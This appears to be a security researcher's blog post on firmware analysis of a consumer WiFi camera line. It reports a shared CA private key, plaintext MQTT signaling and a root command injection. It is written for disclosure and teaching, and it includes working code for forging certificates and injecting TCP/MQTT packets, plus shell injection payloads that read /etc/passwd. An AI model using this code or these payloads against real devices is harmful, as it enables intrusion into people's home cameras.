# Born Insecure: What Firmware Analysis Reveals About IoT Security Debt
I spent several weeks analyzing the firmware and cloud communication protocol of a popular consumer WiFi camera line. Seven firmware images across six models spanning five years of production — from late 2019 through November 2024.
What I found wasn’t the kind of vulnerability that gets introduced by a bad commit or fixed in a patch Tuesday. These are architectural decisions made early in the product’s life that propagated unchanged across every model, every revision, every year. Shared cryptographic keys with trivially guessable passphrases. A plaintext cloud signaling channel with no integrity protection. An internal command execution daemon that pipes unsanitized input straight into system().
None of this is about end-of-life neglect. The newest firmware I analyzed was built in November 2024. These devices were born insecure.
## The Research Setup
The vendor’s firmware images are downloadable from their CDN without authentication — a common pattern in consumer IoT. Each image uses a vendor-specific container format with XOR-obfuscated headers, wrapping a SquashFS filesystem containing the Linux root filesystem and application binaries.
Tools used: binwalk for initial extraction, unsquashfs for filesystem access, Ghidra for static analysis of ARM binaries, Scapy for network-layer testing, and QEMU with FirmAE for dynamic analysis in an emulated environment.
One model shipped with unstripped binaries — full symbol names, function signatures, source file references. This became the Rosetta Stone for understanding the entire codebase, since the same application binary (with symbols stripped) appears across all other models.
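Undoing a repeating-key XOR layer like the one on these container headers is a one-liner once you have the key. The key and header offset below are placeholders, not the vendor's actual values:

```python
def xor_deobfuscate(blob: bytes, key: bytes) -> bytes:
    # XOR with a repeating key is its own inverse, so the same
    # function both obfuscates and de-obfuscates.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))

# HYPOTHETICAL key for illustration -- the real vendor key is not published here.
KEY = bytes.fromhex("5aa5")

# Round-trip check: decoding an encoded header recovers the original bytes.
plain = b"hsqs"  # the SquashFS magic you hope to see after decoding
assert xor_deobfuscate(xor_deobfuscate(plain, KEY), KEY) == plain
```

In practice you locate the obfuscated region by looking for where binwalk's entropy plot drops and signature scanning starts failing, then brute-force short repeating keys against known magic bytes.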
## Finding 1: One Key to Rule Them All
Every Linux-based model ships with an identical certificate bundle containing three files: a self-signed CA certificate, its private key, and a server private key. Both private keys are encrypted — but the passphrases are single dictionary words hardcoded in the application binary, trivially recoverable with strings.
```
$ openssl rsa -in cakey.pem -passin pass:REDACTED
writing RSA key
-----BEGIN RSA PRIVATE KEY-----
[key material]
-----END RSA PRIVATE KEY-----
```
The CA certificate uses 1024-bit RSA with SHA-1 and expired years ago. The private key’s modulus matches — confirming it’s the real signing key, not a placeholder.
The same bundle — byte-for-byte identical — appears in all six Linux-based models I analyzed. MD5 hash matches across firmware images spanning five years.
At runtime, the device uses this CA key to sign per-device TLS certificates. Since every device shares the same CA private key, anyone who downloads any firmware image can forge certificates that the entire product line trusts.
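To illustrate the impact: once the CA key is recovered, forging a certificate the whole fleet trusts takes a few lines with the pyca/cryptography package. This sketch generates a fresh key as a stand-in for the recovered one (in practice you would load cakey.pem with `load_pem_private_key` and the strings-recovered passphrase); the hostname is hypothetical:

```python
import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa

# Stand-in for the CA key extracted from the firmware bundle.
ca_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
ca_name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "Shared Device CA")])

def forge_cert(common_name: str) -> x509.Certificate:
    """Issue a leaf certificate chained to the shared CA. Every device
    that trusts the shared CA will trust this certificate."""
    leaf_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    now = datetime.datetime.now(datetime.timezone.utc)
    return (x509.CertificateBuilder()
            .subject_name(x509.Name(
                [x509.NameAttribute(NameOID.COMMON_NAME, common_name)]))
            .issuer_name(ca_name)                    # issued by the shared CA
            .public_key(leaf_key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now)
            .not_valid_after(now + datetime.timedelta(days=365))
            .sign(ca_key, hashes.SHA256()))          # signed with the leaked key

cert = forge_cert("cloud.vendor.example")  # hypothetical cloud hostname
```

Pair this with ARP or DNS spoofing and the forged certificate terminates the device's TLS sessions transparently.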
But it gets worse. Binary disassembly of the main application reveals that four out of five outbound TLS contexts use SSL_VERIFY_NONE. The device doesn’t verify server certificates on most connections. And decompilation of the vendor’s mobile app reveals an UnSafeTrustManager that accepts any certificate from any server. Both ends of the communication chain fail to validate — making man-in-the-middle attacks trivial for a network-adjacent attacker.
### Why This Matters
This isn’t a misconfiguration. It’s an architectural choice: generate device certificates at runtime using a shared signing key. The approach was presumably simpler than provisioning unique keys per device during manufacturing. That shortcut, made once, propagated to every unit sold for five years.
When the vendor’s security team reviewed the finding, they responded that the keys were “legacy/deprecated.” But the firmware images containing them were still being distributed as of late 2024. Deprecation without removal is not remediation.
## Finding 2: Plaintext Cloud Signaling
The cameras communicate with their cloud platform using MQTT — a lightweight publish/subscribe protocol common in IoT. MQTT supports TLS. This vendor doesn’t use it.
The entire signaling channel runs over plaintext TCP. Every MQTT message — connection setup, topic subscriptions, command/control messages, alarm notifications — is visible to anyone on the same network segment.
```
Protocol: MQTT 3.1.1
Connect Flags: 0xAE (Username, WillRetain, WillQoS=1, Will, CleanSession)
Keepalive: 30 seconds
Username: [DEVICE_SERIAL] ← no password
Will Topic: /Basic/pu2cenplt/[DEVICE_SERIAL]/breakconnect
```
Authentication to the MQTT broker relies solely on the device serial number as the username. No password. The broker validates the serial against a registered device list (external clients are rejected), but a man-in-the-middle attacker doesn’t need to authenticate — they inject into the camera’s existing authenticated session.
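The CONNECT packet above is easy to reproduce from the MQTT 3.1.1 spec. A minimal stdlib-only sketch, matching the captured flags byte (0xAE: username set, no password bit, retained QoS-1 will, clean session); the will-message content is a placeholder since the capture above doesn't show it:

```python
import struct

def mqtt_str(s: bytes) -> bytes:
    """MQTT length-prefixed field: 16-bit big-endian length, then bytes."""
    return struct.pack(">H", len(s)) + s

def remaining_length(n: int) -> bytes:
    """MQTT variable-length 'remaining length' encoding (7 bits per byte)."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)

def build_connect(serial: bytes, keepalive: int = 30) -> bytes:
    CONNECT_FLAGS = 0xAE  # username | will-retain | will-QoS 1 | will | clean session
    var_header = (mqtt_str(b"MQTT") + bytes([0x04, CONNECT_FLAGS])
                  + struct.pack(">H", keepalive))
    will_topic = b"/Basic/pu2cenplt/" + serial + b"/breakconnect"
    payload = (mqtt_str(serial)        # client ID
               + mqtt_str(will_topic)  # will topic
               + mqtt_str(b"offline")  # will message (placeholder content)
               + mqtt_str(serial))     # username = serial; NO password field follows
    body = var_header + payload
    return bytes([0x10]) + remaining_length(len(body)) + body
```

Because the password bit (0x40) is clear, anyone who knows a device serial can assemble a byte-perfect CONNECT; the only gatekeeping is the broker's serial allowlist.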
### TCP Stream Injection
Because there’s no TLS (and therefore no record-layer MAC), a network-adjacent attacker can forge TCP segments containing arbitrary MQTT PUBLISH messages. The camera’s TCP stack accepts the forged packets, and the MQTT layer processes them.
I confirmed this by:
- ARP spoofing the camera on my test network
- Sniffing the live MQTT session to obtain TCP sequence/acknowledgment numbers
- Forging a TCP PSH+ACK segment from the cloud server’s IP containing an MQTT PUBLISH
- Observing the camera ACK the forged packet and respond with an MQTT DISCONNECT — confirming application-layer processing, not just TCP acknowledgment
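The forged segment from the steps above can be sketched with Scapy. The PUBLISH builder is exact MQTT 3.1.1; the injection half is illustrative (addresses, ports, and sequence numbers are hypothetical and must come from the sniffed live session), so the Scapy import is kept local to the function that needs root:

```python
import struct

def mqtt_publish(topic: bytes, payload: bytes) -> bytes:
    """Minimal MQTT 3.1.1 PUBLISH, QoS 0 (no packet identifier)."""
    body = struct.pack(">H", len(topic)) + topic + payload
    assert len(body) < 128  # one remaining-length byte is enough here
    return bytes([0x30, len(body)]) + body

def inject_publish(src, dst, sport, dport, seq, ack, topic, payload):
    """Forge a PSH+ACK segment from the cloud server's address carrying
    an MQTT PUBLISH into the camera's existing session. seq/ack must be
    read from the live stream; requires scapy and root privileges."""
    from scapy.all import IP, TCP, Raw, send
    seg = (IP(src=src, dst=dst)
           / TCP(sport=sport, dport=dport, seq=seq, ack=ack, flags="PA")
           / Raw(mqtt_publish(topic, payload)))
    send(seg, verbose=False)
```

The camera ACKing the forged segment only proves TCP acceptance; the MQTT DISCONNECT it sent back is what proves the application layer parsed the injected PUBLISH.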
The topic structure reveals the complete command/control hierarchy: device registration channels, ISAPI command channels (the same protocol used in the vendor’s parent company’s professional surveillance products), alarm notifications, video/media control, and platform configuration.
### The Padding Oracle That Wasn’t
The application-layer payloads within MQTT messages are encrypted. After confirming TCP injection worked, I spent considerable time investigating whether the encryption was vulnerable to a padding oracle attack.
The validation looked promising at first. Sending the original captured payload produced a response. Sending a payload with broken padding produced silence. Sending a payload with intact padding but modified ciphertext also produced silence. Classic padding oracle behavior — or so I thought.
After building a full brute-force framework with TCP session management, ARP spoofing, and per-byte oracle probing, I ran the actual attack: 0 out of 256 candidate bytes produced consistent responses across retries. The few hits were noise from the network.
The camera validates padding and content atomically. It doesn’t distinguish between a padding error and a content error — it drops all invalid messages silently. Only the exact original payload produces a response. Not a padding oracle.
This is worth documenting because most write-ups only show successful attacks. Recognizing a false positive — where the black-box behavior looks like an oracle but isn’t — is just as important as recognizing a real one. The tell was that the “broken padding” and “broken content” cases were indistinguishable.
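The sanity check that exposed the false positive can be sketched as follows. It uses a deliberately simplified CBC model (flip the last byte to break padding, flip the first byte to break content while leaving padding intact); `probe` stands in for the ARP-spoofed injection harness and reports whether the device answered:

```python
def looks_like_oracle(probe, original: bytes, retries: int = 5) -> bool:
    """Distinguish a real padding oracle from silent atomic validation.

    A device that validates padding and content atomically is silent on
    BOTH failure classes, which passes the naive three-case smoke test
    (valid / broken padding / broken content) but yields no oracle.
    """
    bad_padding = bytearray(original); bad_padding[-1] ^= 0x01
    bad_content = bytearray(original); bad_content[0] ^= 0x01
    # Probe each failure class repeatedly and demand consistency, so
    # one-off network noise doesn't masquerade as a hit.
    pad_hits = sum(probe(bytes(bad_padding)) for _ in range(retries))
    content_hits = sum(probe(bytes(bad_content)) for _ in range(retries))
    return pad_hits != content_hits  # distinguishable => usable oracle
```

Against this camera, both counts were zero on every retry: the failure classes were indistinguishable, so no byte-at-a-time decryption was possible.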
## Finding 3: sprintf to system() — The Command Injection Chain
The main application binary on every Linux-based model contains a WiFi Access Point configuration function. When the device sets up its hotspot mode, it constructs a hostapd configuration file using sprintf() with the SSID and WPA passphrase interpolated directly into a shell command:
```c
sprintf(buf,
        "echo -e \"interface=%s\\nbridge=%s\\n...ssid=%s\\n"
        "...wpa_passphrase=%s\\n\" > /path/hostapd.conf",
        ifname, bridge, SSID, PASSPHRASE);
callSystemCmd(buf);
```
No sanitization. No escaping. No input validation. The SSID and passphrase values flow from the network command dispatch interface — the same interface that handles commands from the cloud platform and the mobile app.
callSystemCmd sends the formatted string over a Unix domain socket to a separate daemon (execSystemCmd) whose entire purpose is receiving strings and passing them to system(). This daemon runs as root, naturally.
### Proving It in QEMU
Since the device requires WiFi hardware for end-to-end exploitation (the NETCMD dispatch checks for a wireless interface before processing WiFi configuration commands), I demonstrated the injection primitive in an emulated environment. The QEMU setup boots the actual firmware filesystem with the real execSystemCmd daemon running:
```
=== Malicious passphrase: $(cat /etc/passwd > /tmp/pwned) ===
[*] system() returned: 0
[*] /tmp/pwned contents:
root:REDACTED:0:0:root:/root/:/bin/sh

=== Malicious SSID: backtick injection ===
[*] system() returned: 0
[*] /tmp/pwned contents:
ROOTED

=== File ownership ===
-rw-r--r-- 1 root root 43 /tmp/pwned
```
Root command execution through a crafted SSID. The same code path exists in all six Linux models, at the same relative offset, with the same format string.
### The execSystemCmd Pattern
The execSystemCmd daemon deserves special attention because it represents a broader antipattern in embedded Linux development. Rather than using execvp() or direct syscalls for system operations, the developers created a centralized “run any shell command” service accessible via Unix socket. Every component in the system — WiFi management, network configuration, firmware updates — sends shell command strings to this daemon.
This turns every sprintf call in the entire codebase into a potential command injection vector. It’s the embedded equivalent of building your entire web application on eval().
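The difference is easy to demonstrate in miniature. In this sketch (Python standing in for the C code path), routing the formatted string through a shell executes the attacker's `$()` substitution, while exec-ing an argument vector keeps the same bytes inert:

```python
import subprocess

ssid = "$(echo INJECTED)"  # attacker-controlled SSID value

# Vulnerable pattern (the execSystemCmd model): the formatted command
# line is handed to a shell, so the command substitution executes.
vuln = subprocess.run(f"echo ssid={ssid}", shell=True,
                      capture_output=True, text=True)
print(vuln.stdout.strip())   # ssid=INJECTED  <- attacker code ran

# Safe pattern: exec an argument vector directly (the execvp model);
# no shell ever parses the SSID, so the metacharacters stay data.
safe = subprocess.run(["echo", f"ssid={ssid}"],
                      capture_output=True, text=True)
print(safe.stdout.strip())   # ssid=$(echo INJECTED)
```

This is why "trace the call chain" matters: the identical sprintf is harmless if the sink is an exec-style call, and game over if the sink is system().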
## The Security Debt Compounding Problem
What makes these findings significant isn’t any individual vulnerability — it’s the pattern of compounding.
The shared CA key enables man-in-the-middle. The plaintext MQTT channel enables session injection. The command injection chain enables root code execution through crafted configuration data. Each finding makes the others worse:
```
  Shared CA key (MitM)
+ Plaintext MQTT (injection)
+ sprintf→system() (code execution)
= Remote root compromise from network adjacency
```
And all of it ships on every device, unchanged, for five years.
This is what “security debt” looks like in IoT. A design decision made in 2019 (or earlier) — use a shared CA key, skip TLS on MQTT, route everything through system() — becomes load-bearing architecture. It can’t be fixed without:
- Manufacturing-line changes (per-device key provisioning)
- Protocol migration (MQTT over TLS, breaking backward compatibility with existing cloud infrastructure)
- Application rewrite (replacing the execSystemCmd daemon and every call site)
Each of these is a major engineering effort. For a device that retails for $30-50 and has margins measured in single-digit percentages, the economic incentive to fix is… limited.
## The Vendor Response
I reported these findings through the vendor’s bug bounty program. The results:
- Shared CA key: Closed as duplicate. The keys were described as “legacy/deprecated” — though still shipping in current firmware.
- Plaintext MQTT + TCP injection: Rejected. The vendor argued that TCP acknowledgment doesn’t prove business-layer impact, and that “LAN access required” diminishes severity. They noted that TLS migration was underway.
- Command injection: Closed as duplicate. The vendor acknowledged it as a real issue but stated it was “already discovered and resolved during internal self-inspection” in a newer firmware version. They noted that exploitation required two levels of permission verification at the business layer.
The vendor’s position is defensible from a narrow scope: proving end-to-end exploitation requires hardware I don’t have, and “network-adjacent” is a real constraint on exploitability. But it misses the larger point. These aren’t edge cases or theoretical issues — they’re fundamental architecture that affects every unit in the field.
## Lessons for Researchers
1. One unstripped binary unlocks the whole fleet. If a vendor ships even one debug build across their product line, the symbol names transfer directly to the stripped builds of other models. Spend time finding it.
2. False positive oracles are common in IoT. Devices that drop all invalid messages silently can look like padding oracles when tested with only three cases (valid, broken padding, broken content). Always run the full brute-force before concluding you have an oracle — and verify that your “hit” case is actually distinguishable from noise.
3. Trace the full call chain before assuming injection. Some embedded frameworks use fork + execvp instead of system(), making shell injection impossible even when sprintf is present. Check whether callSystemCmd eventually hits system(), popen(), or execvp(). The difference is everything.
4. QEMU + FirmAE fills the hardware gap — but only partially. You can demonstrate code paths and injection primitives, but anything requiring hardware peripherals (WiFi, Bluetooth, USB) needs the real device. Be transparent about what you proved in emulation vs. what you inferred from static analysis.
5. Shared secrets are the gift that keeps giving. Identical cryptographic material across a product line means one firmware download compromises every device ever shipped. This is the highest-leverage finding type in IoT research — and vendors consistently underestimate its severity.
## The Bigger Picture
The devices I analyzed aren’t outliers. The patterns — shared keys, plaintext protocols, system() misuse — are endemic in consumer IoT, especially in products derived from surveillance/CCTV platforms that were originally designed for isolated networks and later adapted for cloud connectivity.
The “end of life” framing is a red herring. EOL means the vendor stops shipping patches. But the implication — that the device was secure before support ended — is usually wrong. The security debt was there from day one, compounding silently in millions of homes and offices.
The $30 camera on your shelf wasn’t made insecure by time. It was born that way.
The research described in this post was conducted under a legitimate bug bounty program on the author’s own devices and test network. Vendor-identifying information has been removed at the vendor’s request. No exploitation was performed against devices owned by others.
Tools referenced: Ghidra, FirmAE, Scapy, binwalk, bettercap.